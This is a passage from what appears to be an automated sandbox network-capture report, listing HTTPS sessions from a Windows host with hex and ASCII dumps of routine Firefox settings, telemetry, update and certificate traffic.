2e 35 39 33 38 2e 31 33 32 22 5d 2c 5b 33 2c 30 2c 30 Data Ascii: [[1,null,null,null,null,null,null,null,null,null,[null,null,null,null,"en",null,"boq_identityfrontendauthuiserver_20240723.00_p0",null,[[["Google Chrome","117"],["Not;A=Brand","8"],["Chromium","117"]],0,"Windows","10.0.0","x86","","117.0.5938.132"],[3,0,0
2024-07-26 18:10:58 UTC	523	IN	HTTP/1.1 200 OK Access-Control-Allow-Origin: https://accounts.google.com Cross-Origin-Resource-Policy: cross-origin Access-Control-Allow-Credentials: true Access-Control-Allow-Headers: X-Playlog-Web Content-Type: text/plain; charset=UTF-8 Date: Fri, 26 Jul 2024 18:10:58 GMT Server: Playlog Cache-Control: private X-XSS-Protection: 0 X-Frame-Options: SAMEORIGIN Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000 Accept-Ranges: none Vary: Accept-Encoding Connection: close Transfer-Encoding: chunked
2024-07-26 18:10:58 UTC	137	IN	Data Raw: 38 33 0d 0a 5b 22 2d 31 22 2c 6e 75 6c 6c 2c 5b 5b 5b 22 41 4e 44 52 4f 49 44 5f 42 41 43 4b 55 50 22 2c 30 5d 2c 5b 22 42 41 54 54 45 52 59 5f 53 54 41 54 53 22 2c 30 5d 2c 5b 22 53 4d 41 52 54 5f 53 45 54 55 50 22 2c 30 5d 2c 5b 22 54 52 4f 4e 22 2c 30 5d 5d 2c 2d 33 33 33 34 37 33 37 35 39 34 30 32 34 39 37 31 32 32 35 5d 2c 5b 5d 2c 7b 22 31 37 35 32 33 37 33 37 35 22 3a 5b 31 30 30 30 30 5d 7d 5d 0d 0a Data Ascii: 83["-1",null,[[["ANDROID_BACKUP",0],["BATTERY_STATS",0],["SMART_SETUP",0],["TRON",0]],-3334737594024971225],[],{"175237375":[10000]}]
2024-07-26 18:10:58 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
62	192.168.2.5	64181	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:10:59 UTC	416	OUT	GET /v1/buckets/main/collections/search-telemetry-v2/changeset?_expected=1718041017650&_since=%221694014137037%22 HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive
2024-07-26 18:10:59 UTC	558	IN	HTTP/1.1 200 OK Server: nginx Content-Length: 13519 Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Backoff, Content-Type, Retry-After, Content-Length, Alert X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none'; base-uri 'none'; Strict-Transport-Security: max-age=31536000 Via: 1.1 google Date: Fri, 26 Jul 2024 17:14:14 GMT Age: 3405 Last-Modified: Fri, 26 Jul 2024 00:00:07 GMT Content-Type: application/json Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:10:59 UTC	832	IN	Data Raw: 7b 22 6d 65 74 61 64 61 74 61 22 3a 7b 22 73 6f 72 74 22 3a 22 2d 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 2c 22 73 63 68 65 6d 61 22 3a 7b 22 74 79 70 65 22 3a 22 6f 62 6a 65 63 74 22 2c 22 72 65 71 75 69 72 65 64 22 3a 5b 22 74 65 6c 65 6d 65 74 72 79 49 64 22 2c 22 73 65 61 72 63 68 50 61 67 65 52 65 67 65 78 70 22 2c 22 71 75 65 72 79 50 61 72 61 6d 4e 61 6d 65 22 5d 2c 22 70 72 6f 70 65 72 74 69 65 73 22 3a 7b 22 74 61 67 67 65 64 43 6f 64 65 73 22 3a 7b 22 74 79 70 65 22 3a 22 61 72 72 61 79 22 2c 22 69 74 65 6d 73 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 70 61 74 74 65 72 6e 22 3a 22 5e 5b 61 2d 7a 41 2d 5a 30 2d 39 2d 2e 5f 5d 2a 24 22 7d 2c 22 74 69 74 6c 65 22 3a 22 50 61 72 74 6e 65 72 20 43 6f 64 65 73 22 2c 22 64 65 73 63 Data Ascii: {"metadata":{"sort":"-last_modified","schema":{"type":"object","required":["telemetryId","searchPageRegexp","queryParamName"],"properties":{"taggedCodes":{"type":"array","items":{"type":"string","pattern":"^[a-zA-Z0-9-._]*$"},"title":"Partner Codes","desc
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 72 20 43 6f 64 65 20 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 68 65 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 71 75 65 72 79 20 70 61 72 61 6d 65 74 65 72 20 66 6f 72 20 74 68 65 20 70 61 72 74 6e 65 72 20 63 6f 64 65 2e 22 7d 2c 22 71 75 65 72 79 50 61 72 61 6d 4e 61 6d 65 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 2c 22 74 69 74 6c 65 22 3a 22 53 65 61 72 63 68 20 51 75 65 72 79 20 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 54 68 65 20 6e 61 6d 65 20 6f 66 20 74 68 65 20 71 75 65 72 79 20 70 61 72 61 6d 65 74 65 72 20 66 6f 72 20 74 68 65 20 75 73 65 72 27 73 20 73 65 61 72 63 68 20 73 74 72 69 6e 67 2e 22 7d 2c 22 66 6f 6c 6c 6f 77 4f 6e 43 Data Ascii: r Code Parameter Name","description":"The name of the query parameter for the partner code."},"queryParamName":{"type":"string","title":"Search Query Parameter Name","description":"The name of the query parameter for the user's search string."},"followOnC
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 7a 30 2d 39 2d 2e 5f 5d 2a 24 22 7d 2c 22 74 69 74 6c 65 22 3a 22 46 6f 6c 6c 6f 77 2d 6f 6e 20 53 65 61 72 63 68 20 50 61 72 61 6d 65 74 65 72 20 4e 61 6d 65 73 22 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 41 6e 20 61 72 72 61 79 20 6f 66 20 71 75 65 72 79 20 70 61 72 61 6d 65 74 65 72 20 6e 61 6d 65 73 20 74 68 61 74 20 61 72 65 20 75 73 65 64 20 77 68 65 6e 20 61 20 66 6f 6c 6c 6f 77 2d 6f 6e 20 73 65 61 72 63 68 20 6f 63 63 75 72 73 2e 22 7d 2c 22 65 78 74 72 61 41 64 53 65 72 76 65 72 73 52 65 67 65 78 70 73 22 3a 7b 22 74 79 70 65 22 3a 22 61 72 72 61 79 22 2c 22 69 74 65 6d 73 22 3a 7b 22 74 79 70 65 22 3a 22 73 74 72 69 6e 67 22 7d 2c 22 74 69 74 6c 65 22 3a 22 45 78 74 72 61 20 41 64 20 53 65 72 76 65 72 20 52 65 67 75 6c 61 72 20 45 78 70 Data Ascii: z0-9-._]*$"},"title":"Follow-on Search Parameter Names","description":"An array of query parameter names that are used when a follow-on search occurs."},"extraAdServersRegexps":{"type":"array","items":{"type":"string"},"title":"Extra Ad Server Regular Exp
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 6c 22 2c 22 69 6e 63 6c 75 64 65 64 22 3a 7b 22 70 61 72 65 6e 74 22 3a 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 2e 73 68 2d 73 72 5f 5f 73 68 6f 70 2d 72 65 73 75 6c 74 2d 67 72 6f 75 70 22 7d 2c 22 72 65 6c 61 74 65 64 22 3a 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 67 2d 72 69 67 68 74 2d 62 75 74 74 6f 6e 2c 20 67 2d 6c 65 66 74 2d 62 75 74 74 6f 6e 22 7d 2c 22 63 68 69 6c 64 72 65 6e 22 3a 5b 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 2e 73 68 2d 6e 70 5f 5f 63 6c 69 63 6b 2d 74 61 72 67 65 74 22 2c 22 63 6f 75 6e 74 43 68 69 6c 64 72 65 6e 22 3a 74 72 75 65 7d 5d 7d 7d 2c 7b 22 74 79 70 65 22 3a 22 72 65 66 69 6e 65 64 5f 73 65 61 72 63 68 5f 62 75 74 74 6f 6e 73 22 2c 22 74 6f 70 44 6f 77 6e 22 3a 74 72 75 65 2c 22 69 6e 63 6c 75 64 65 64 22 3a 7b 22 70 61 Data Ascii: l","included":{"parent":{"selector":".sh-sr__shop-result-group"},"related":{"selector":"g-right-button, g-left-button"},"children":[{"selector":".sh-np__click-target","countChildren":true}]}},{"type":"refined_search_buttons","topDown":true,"included":{"pa
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 5f 72 65 6a 65 63 74 22 2c 22 65 76 65 6e 74 54 79 70 65 22 3a 22 63 6c 69 63 6b 22 7d 5d 7d 2c 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 62 75 74 74 6f 6e 23 56 6e 6a 43 63 62 22 2c 22 65 76 65 6e 74 4c 69 73 74 65 6e 65 72 73 22 3a 5b 7b 22 61 63 74 69 6f 6e 22 3a 22 63 6c 69 63 6b 65 64 5f 6d 6f 72 65 5f 6f 70 74 69 6f 6e 73 22 2c 22 65 76 65 6e 74 54 79 70 65 22 3a 22 63 6c 69 63 6b 22 7d 5d 7d 5d 7d 7d 2c 7b 22 74 79 70 65 22 3a 22 61 64 5f 6c 69 6e 6b 22 2c 22 64 65 66 61 75 6c 74 22 3a 74 72 75 65 7d 5d 2c 22 73 68 6f 70 70 69 6e 67 54 61 62 22 3a 7b 22 72 65 67 65 78 70 22 3a 22 26 74 62 6d 3d 73 68 6f 70 22 2c 22 73 65 6c 65 63 74 6f 72 22 3a 22 64 69 76 5b 72 6f 6c 65 3d 27 6e 61 76 69 67 61 74 69 6f 6e 27 5d 20 61 22 2c 22 69 6e 73 70 65 63 74 52 Data Ascii: _reject","eventType":"click"}]},{"selector":"button#VnjCcb","eventListeners":[{"action":"clicked_more_options","eventType":"click"}]}]}},{"type":"ad_link","default":true}],"shoppingTab":{"regexp":"&tbm=shop","selector":"div[role='navigation'] a","inspectR
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 72 63 68 22 2c 22 69 67 6e 6f 72 65 4c 69 6e 6b 52 65 67 65 78 70 73 22 3a 5b 22 5e 68 74 74 70 73 3f 3a 2f 2f 63 6f 6e 73 65 6e 74 5c 5c 2e 67 6f 6f 67 6c 65 5c 5c 2e 28 3f 3a 2e 2b 29 2f 64 5c 5c 3f 63 6f 6e 74 69 6e 75 65 5c 5c 3d 22 5d 2c 22 6e 6f 6e 41 64 73 4c 69 6e 6b 52 65 67 65 78 70 73 22 3a 5b 22 5e 68 74 74 70 73 3f 3a 2f 2f 77 77 77 5c 5c 2e 67 6f 6f 67 6c 65 5c 5c 2e 28 3f 3a 2e 2b 29 2f 75 72 6c 3f 28 3f 3a 2e 2b 29 26 75 72 6c 3d 22 5d 2c 22 61 64 53 65 72 76 65 72 41 74 74 72 69 62 75 74 65 73 22 3a 5b 22 72 77 22 5d 2c 22 66 6f 6c 6c 6f 77 4f 6e 50 61 72 61 6d 4e 61 6d 65 73 22 3a 5b 22 6f 71 22 2c 22 76 65 64 22 2c 22 65 69 22 5d 2c 22 65 78 74 72 61 41 64 53 65 72 76 65 72 73 52 65 67 65 78 70 73 22 3a 5b 22 5e 68 74 74 70 73 3f 3a 2f Data Ascii: rch","ignoreLinkRegexps":["^https?://consent\\.google\\.(?:.+)/d\\?continue\\="],"nonAdsLinkRegexps":["^https?://www\\.google\\.(?:.+)/url?(?:.+)&url="],"adServerAttributes":["rw"],"followOnParamNames":["oq","ved","ei"],"extraAdServersRegexps":["^https?:/
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 71 77 61 6e 74 5c 5c 2e 63 6f 6d 2f 76 33 2f 72 2f 22 5d 2c 22 69 64 22 3a 22 31 39 63 34 33 34 61 33 2d 64 31 37 33 2d 34 38 37 31 2d 39 37 34 33 2d 32 39 30 61 63 39 32 61 33 66 36 62 22 2c 22 6c 61 73 74 5f 6d 6f 64 69 66 69 65 64 22 3a 31 37 31 33 31 38 37 33 38 39 30 36 36 7d 2c 7b 22 73 63 68 65 6d 61 22 3a 31 37 31 32 35 38 32 35 31 37 34 33 30 2c 22 63 6f 6d 70 6f 6e 65 6e 74 73 22 3a 5b 7b 22 74 79 70 65 22 3a 22 61 64 5f 63 61 72 6f 75 73 65 6c 22 2c 22 69 6e 63 6c 75 64 65 64 22 3a 7b 22 70 61 72 65 6e 74 22 3a 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 2e 61 64 73 4d 76 43 61 72 6f 75 73 65 6c 22 7d 2c 22 72 65 6c 61 74 65 64 22 3a 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 2e 63 72 22 7d 2c 22 63 68 69 6c 64 72 65 6e 22 3a 5b 7b 22 73 65 6c 65 63 74 Data Ascii: qwant\\.com/v3/r/"],"id":"19c434a3-d173-4871-9743-290ac92a3f6b","last_modified":1713187389066},{"schema":1712582517430,"components":[{"type":"ad_carousel","included":{"parent":{"selector":".adsMvCarousel"},"related":{"selector":".cr"},"children":[{"select
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 2c 22 4d 4f 5a 4f 22 2c 22 4d 4f 5a 52 22 2c 22 4d 4f 5a 54 22 2c 22 4d 4f 5a 57 22 2c 22 4d 4f 5a 58 22 2c 22 4d 5a 53 4c 30 31 22 2c 22 4d 5a 53 4c 30 32 22 2c 22 4d 5a 53 4c 30 33 22 5d 2c 22 74 65 6c 65 6d 65 74 72 79 49 64 22 3a 22 62 69 6e 67 22 2c 22 6f 72 67 61 6e 69 63 43 6f 64 65 73 22 3a 5b 5d 2c 22 63 6f 64 65 50 61 72 61 6d 4e 61 6d 65 22 3a 22 70 63 22 2c 22 71 75 65 72 79 50 61 72 61 6d 4e 61 6d 65 22 3a 22 71 22 2c 22 66 6f 6c 6c 6f 77 4f 6e 43 6f 6f 6b 69 65 73 22 3a 5b 7b 22 68 6f 73 74 22 3a 22 77 77 77 2e 62 69 6e 67 2e 63 6f 6d 22 2c 22 6e 61 6d 65 22 3a 22 53 52 43 48 53 22 2c 22 63 6f 64 65 50 61 72 61 6d 4e 61 6d 65 22 3a 22 50 43 22 2c 22 65 78 74 72 61 43 6f 64 65 50 72 65 66 69 78 65 73 22 3a 5b 22 51 42 52 45 22 5d 2c 22 65 78 Data Ascii: ,"MOZO","MOZR","MOZT","MOZW","MOZX","MZSL01","MZSL02","MZSL03"],"telemetryId":"bing","organicCodes":[],"codeParamName":"pc","queryParamName":"q","followOnCookies":[{"host":"www.bing.com","name":"SRCHS","codeParamName":"PC","extraCodePrefixes":["QBRE"],"ex
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 6c 65 74 65 22 7d 2c 22 63 68 69 6c 64 72 65 6e 22 3a 5b 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 20 69 6e 70 75 74 23 73 65 61 72 63 68 5f 66 6f 72 6d 5f 69 6e 70 75 74 22 7d 5d 7d 7d 2c 7b 22 74 79 70 65 22 3a 22 61 64 5f 73 69 64 65 62 61 72 22 2c 22 69 6e 63 6c 75 64 65 64 22 3a 7b 22 70 61 72 65 6e 74 22 3a 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 2e 6a 73 2d 72 65 73 75 6c 74 73 2d 73 69 64 65 62 61 72 22 7d 2c 22 63 68 69 6c 64 72 65 6e 22 3a 5b 7b 22 73 65 6c 65 63 74 6f 72 22 3a 22 61 72 74 69 63 6c 65 5b 64 61 74 61 2d 74 65 73 74 69 64 3d 27 61 64 27 5d 22 2c 22 63 6f 75 6e 74 43 68 69 6c 64 72 65 6e 22 3a 74 72 75 65 7d 5d 7d 7d 2c 7b 22 74 79 70 65 22 3a 22 61 64 5f 6c 69 6e 6b 22 2c 22 64 65 66 61 75 6c 74 22 3a 74 72 75 65 7d 5d 2c 22 73 68 6f Data Ascii: lete"},"children":[{"selector":" input#search_form_input"}]}},{"type":"ad_sidebar","included":{"parent":{"selector":".js-results-sidebar"},"children":[{"selector":"article[data-testid='ad']","countChildren":true}]}},{"type":"ad_link","default":true}],"sho
2024-07-26 18:10:59 UTC	1390	IN	Data Raw: 6f 6e 6c 69 6e 65 5f 37 5f 64 67 22 5d 2c 22 74 65 6c 65 6d 65 74 72 79 49 64 22 3a 22 62 61 69 64 75 22 2c 22 6f 72 67 61 6e 69 63 43 6f 64 65 73 22 3a 5b 5d 2c 22 63 6f 64 65 50 61 72 61 6d 4e 61 6d 65 22 3a 22 74 6e 22 2c 22 71 75 65 72 79 50 61 72 61 6d 4e 61 6d 65 22 3a 22 77 64 22 2c 22 71 75 65 72 79 50 61 72 61 6d 4e 61 6d 65 73 22 3a 5b 22 77 64 22 2c 22 77 6f 72 64 22 5d 2c 22 73 65 61 72 63 68 50 61 67 65 52 65 67 65 78 70 22 3a 22 5e 68 74 74 70 73 3a 2f 2f 28 3f 3a 6d 7c 77 77 77 29 5c 5c 2e 62 61 69 64 75 5c 5c 2e 63 6f 6d 2f 28 3f 3a 73 7c 62 61 69 64 75 29 22 2c 22 66 6f 6c 6c 6f 77 4f 6e 50 61 72 61 6d 4e 61 6d 65 73 22 3a 5b 22 6f 71 22 5d 2c 22 65 78 74 72 61 41 64 53 65 72 76 65 72 73 52 65 67 65 78 70 73 22 3a 5b 22 5e 68 74 74 70 73 Data Ascii: online_7_dg"],"telemetryId":"baidu","organicCodes":[],"codeParamName":"tn","queryParamName":"wd","queryParamNames":["wd","word"],"searchPageRegexp":"^https://(?:m\|www)\\.baidu\\.com/(?:s\|baidu)","followOnParamNames":["oq"],"extraAdServersRegexps":["^https

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
63	192.168.2.5	64189	34.120.208.123	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:00 UTC	620	OUT	POST /submit/firefox-desktop/metrics/1/ed3379b6-0cc6-4660-a6e6-1688363eff16 HTTP/1.1 Host: incoming.telemetry.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br content-length: 3405 content-encoding: gzip content-type: application/json; charset=utf-8 date: Fri, 26 Jul 2024 19:27:25 GMT x-telemetry-agent: Glean/53.2.0 (Rust on Windows) Connection: keep-alive Sec-Fetch-Dest: empty Sec-Fetch-Mode: no-cors Sec-Fetch-Site: none Pragma: no-cache Cache-Control: no-cache
2024-07-26 18:11:00 UTC	3405	OUT	Data Raw: 1f 8b 08 00 00 00 00 00 00 ff 8d 5a db 6e e4 c6 11 fd 97 79 c8 8b 97 e3 be 5f 04 18 c9 5b 90 e7 38 c8 43 10 0c 48 0e 47 a2 97 43 8e 79 91 76 bd d8 7f cf e9 0b 39 dd d4 68 1d c0 f0 4a 64 b3 bb ba ea 9c 53 d5 5d fa 76 b8 b5 fd f3 a9 ed 2f c3 e1 e9 db 61 6a 7e 3f 3c 91 4f 87 69 2e c7 f9 34 b7 d7 e6 f0 74 60 84 89 82 e8 82 a9 5f a9 7c 62 ba 20 e2 89 90 c3 a7 43 d3 9f ff 74 cc d8 94 d3 d0 63 c4 f0 da 8c e7 a5 71 9f 7d b9 35 23 3e eb e7 29 ac 39 de 8a f2 5c cc 4d d7 5c 9b 79 fc 5a 8c 43 d7 0d cb ec 5e 56 63 d9 d7 2f f8 bc 1e fa 19 cf fd e7 f3 58 ba 77 4d ef 06 ba 79 fe 71 c6 08 71 a9 a4 b5 15 6c a8 2e 4d 21 c8 a5 2c ca a6 e6 85 ac 24 3d d7 e7 e6 a2 24 c3 e7 f3 d7 9b 33 b8 6f af d5 32 6d 4b 7d ff fe e9 50 4f af 45 7b bd 0d e3 5c 8c b0 a5 9c 9a 87 96 34 7d 59 75 Data Ascii: Zny_[8CHGCyv9hJdS]v/aj~?<Oi.4t`_\|b Ctcq}5#>)9\M\yZC^Vc/XwMyqql.M!,$=$3o2mK}POE{\4}Yu
2024-07-26 18:11:00 UTC	662	IN	HTTP/1.1 200 OK Server: openresty Date: Fri, 26 Jul 2024 18:11:00 GMT Content-Type: text/plain; charset=utf-8 Vary: Accept-Encoding Strict-Transport-Security: max-age=31536000 X-Frame-Options: DENY Access-Control-Allow-Methods: GET, POST, PUT, OPTIONS Access-Control-Max-Age: 1728000 Access-Control-Allow-Headers: Accept-Encoding,Connection,Content-Encoding,Content-Length,Content-Type,DNT,Date,Sec-Fetch-Dest,Sec-Fetch-Mode,Sec-Fetch-Site,User-Agent,X-Client-Type,X-Client-Version,X-Debug-ID,X-Forwarded-For,X-Pingsender-Version,X-Pipeline-Proxy,X-Source-Tags,X-Telemetry-Agent Via: 1.1 google Content-Length: 0 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
64	192.168.2.5	64191	34.149.100.209	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:00 UTC	456	OUT	GET /v1/buckets/main/collections/ms-language-packs/records/cfr-v1-en-US HTTP/1.1 Host: firefox.settings.services.mozilla.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: application/json Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Content-Type: application/json Connection: keep-alive If-Modified-Since: Fri, 25 Mar 2022 17:45:46 GMT If-None-Match: "1648230346554"
2024-07-26 18:11:00 UTC	171	IN	HTTP/1.1 304 Not Modified Date: Fri, 26 Jul 2024 17:37:23 GMT Age: 2017 ETag: "1648230346554" Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
65	192.168.2.5	64192	35.244.181.201	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:00 UTC	467	OUT	GET /update/6/Firefox/118.0.1/20230927232528/WINNT_x86_64-msvc-x64/en-US/release/Windows_NT%252010.0.0.0.19045.2006%2520(x64)/ISET%3ASSE4_2%2CMEM%3A8191/default/default/update.xml?force=1 HTTP/1.1 Host: aus5.mozilla.org User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Cache-Control: no-cache Pragma: no-cache Connection: keep-alive
2024-07-26 18:11:00 UTC	454	IN	HTTP/1.1 200 OK Server: nginx Date: Fri, 26 Jul 2024 18:11:00 GMT Content-Type: text/xml; charset=utf-8 Content-Length: 702 Vary: Accept-Encoding Rule-ID: 17933 Rule-Data-Version: 1 Strict-Transport-Security: max-age=31536000; X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'none'; frame-ancestors 'none' X-Proxy-Cache-Status: MISS Via: 1.1 google Cache-Control: public,max-age=90 Alt-Svc: clear Connection: close
2024-07-26 18:11:00 UTC	702	IN	Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 3f 3e 0a 3c 75 70 64 61 74 65 73 3e 0a 20 20 20 20 3c 75 70 64 61 74 65 20 61 63 74 69 6f 6e 73 3d 22 73 68 6f 77 55 52 4c 22 20 61 70 70 56 65 72 73 69 6f 6e 3d 22 31 32 37 2e 30 22 20 62 75 69 6c 64 49 44 3d 22 32 30 32 34 30 36 30 36 31 38 31 39 34 34 22 20 64 65 74 61 69 6c 73 55 52 4c 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 65 6e 2d 55 53 2f 66 69 72 65 66 6f 78 2f 31 32 37 2e 30 2f 72 65 6c 65 61 73 65 6e 6f 74 65 73 2f 22 20 64 69 73 70 6c 61 79 56 65 72 73 69 6f 6e 3d 22 31 32 37 2e 30 22 20 6f 70 65 6e 55 52 4c 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 6d 6f 7a 69 6c 6c 61 2e 6f 72 67 2f 66 69 72 65 66 6f 78 2f 31 32 37 2e 30 2f 77 68 61 74 73 6e 65 77 Data Ascii: <?xml version="1.0"?><updates> <update actions="showURL" appVersion="127.0" buildID="20240606181944" detailsURL="https://www.mozilla.org/en-US/firefox/127.0/releasenotes/" displayVersion="127.0" openURL="https://www.mozilla.org/firefox/127.0/whatsnew

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
66	192.168.2.5	64193	34.160.144.191	443	6968	C:\Program Files\Mozilla Firefox\firefox.exe

Timestamp	Bytes transferred	Direction	Data
2024-07-26 18:11:00 UTC	339	OUT	GET /chains/remote-settings.content-signature.mozilla.org-2024-08-29-13-50-59.chain HTTP/1.1 Host: content-signature-2.cdn.mozilla.net User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:109.0) Gecko/20100101 Firefox/118.0 Accept: / Accept-Language: en-US,en;q=0.5 Accept-Encoding: gzip, deflate, br Connection: keep-alive
2024-07-26 18:11:00 UTC	549	IN	HTTP/1.1 200 OK X-Amz-Id-2: L7weLFLYe8XXCBNfE+Gmx8kNCIacxk2tSVk59CLDZE/73dZS5n6QhSjx916/U0dqxB92RB0ccU321QG8eeNgwQ== X-Amz-Request-Id: V8MF9W3AFEXZFX0C X-Amz-Server-Side-Encryption: AES256 Content-Disposition: attachment Accept-Ranges: bytes Server: AmazonS3 Content-Length: 5348 Via: 1.1 google Date: Fri, 26 Jul 2024 17:12:54 GMT Age: 3486 Last-Modified: Wed, 10 Jul 2024 13:51:00 GMT ETag: "567ab019fa84d69be8d84ac3ddfb2b91" Content-Type: binary/octet-stream Cache-Control: public,max-age=3600 Alt-Svc: clear Connection: close
2024-07-26 18:11:00 UTC	841	IN	Data Raw: 2d 2d 2d 2d 2d 42 45 47 49 4e 20 43 45 52 54 49 46 49 43 41 54 45 2d 2d 2d 2d 2d 0a 4d 49 49 44 42 44 43 43 41 6f 75 67 41 77 49 42 41 67 49 49 46 2b 44 65 53 43 56 50 36 32 59 77 43 67 59 49 4b 6f 5a 49 7a 6a 30 45 41 77 4d 77 67 61 4d 78 43 7a 41 4a 42 67 4e 56 42 41 59 54 0a 41 6c 56 54 4d 52 77 77 47 67 59 44 56 51 51 4b 45 78 4e 4e 62 33 70 70 62 47 78 68 49 45 4e 76 63 6e 42 76 63 6d 46 30 61 57 39 75 4d 53 38 77 4c 51 59 44 56 51 51 4c 45 79 5a 4e 62 33 70 70 0a 62 47 78 68 49 45 46 4e 54 79 42 51 63 6d 39 6b 64 57 4e 30 61 57 39 75 49 46 4e 70 5a 32 35 70 62 6d 63 67 55 32 56 79 64 6d 6c 6a 5a 54 46 46 4d 45 4d 47 41 31 55 45 41 77 77 38 51 32 39 75 0a 64 47 56 75 64 43 42 54 61 57 64 75 61 57 35 6e 49 45 6c 75 64 47 56 79 62 57 56 6b 61 57 46 30 Data Ascii: -----BEGIN CERTIFICATE-----MIIDBDCCAougAwIBAgIIF+DeSCVP62YwCgYIKoZIzj0EAwMwgaMxCzAJBgNVBAYTAlVTMRwwGgYDVQQKExNNb3ppbGxhIENvcnBvcmF0aW9uMS8wLQYDVQQLEyZNb3ppbGxhIEFNTyBQcm9kdWN0aW9uIFNpZ25pbmcgU2VydmljZTFFMEMGA1UEAww8Q29udGVudCBTaWduaW5nIEludGVybWVkaWF0
2024-07-26 18:11:00 UTC	1390	IN	Data Raw: 54 41 34 42 67 4e 56 48 52 45 45 4d 54 41 76 67 69 31 79 5a 57 31 76 64 47 55 74 63 32 56 30 0a 64 47 6c 75 5a 33 4d 75 59 32 39 75 64 47 56 75 64 43 31 7a 61 57 64 75 59 58 52 31 63 6d 55 75 62 57 39 36 61 57 78 73 59 53 35 76 63 6d 63 77 43 67 59 49 4b 6f 5a 49 7a 6a 30 45 41 77 4d 44 0a 5a 77 41 77 5a 41 49 77 58 70 47 5a 36 64 5a 64 30 35 50 6f 43 75 4e 37 59 32 7a 67 4d 2b 37 35 71 6d 79 61 6a 76 64 71 6a 73 6b 74 52 4f 31 55 2f 41 41 4c 33 67 64 7a 4b 4e 6f 42 59 62 4e 2b 0a 79 38 68 56 63 34 30 4b 41 6a 41 51 67 57 75 54 48 35 56 30 58 33 6e 31 45 69 33 61 65 63 39 2f 5a 74 5a 4e 75 42 30 4e 42 42 43 56 37 30 39 42 45 49 31 38 6a 39 6d 4e 69 4a 48 36 50 48 46 46 0a 30 70 42 49 6f 6e 62 75 49 57 63 3d 0a 2d 2d 2d 2d 2d 45 4e 44 20 43 45 52 54 49 46 Data Ascii: TA4BgNVHREEMTAvgi1yZW1vdGUtc2V0dGluZ3MuY29udGVudC1zaWduYXR1cmUubW96aWxsYS5vcmcwCgYIKoZIzj0EAwMDZwAwZAIwXpGZ6dZd05PoCuN7Y2zgM+75qmyajvdqjsktRO1U/AAL3gdzKNoBYbN+y8hVc40KAjAQgWuTH5V0X3n1Ei3aec9/ZtZNuB0NBBCV709BEI18j9mNiJH6PHFF0pBIonbuIWc=-----END CERTIF
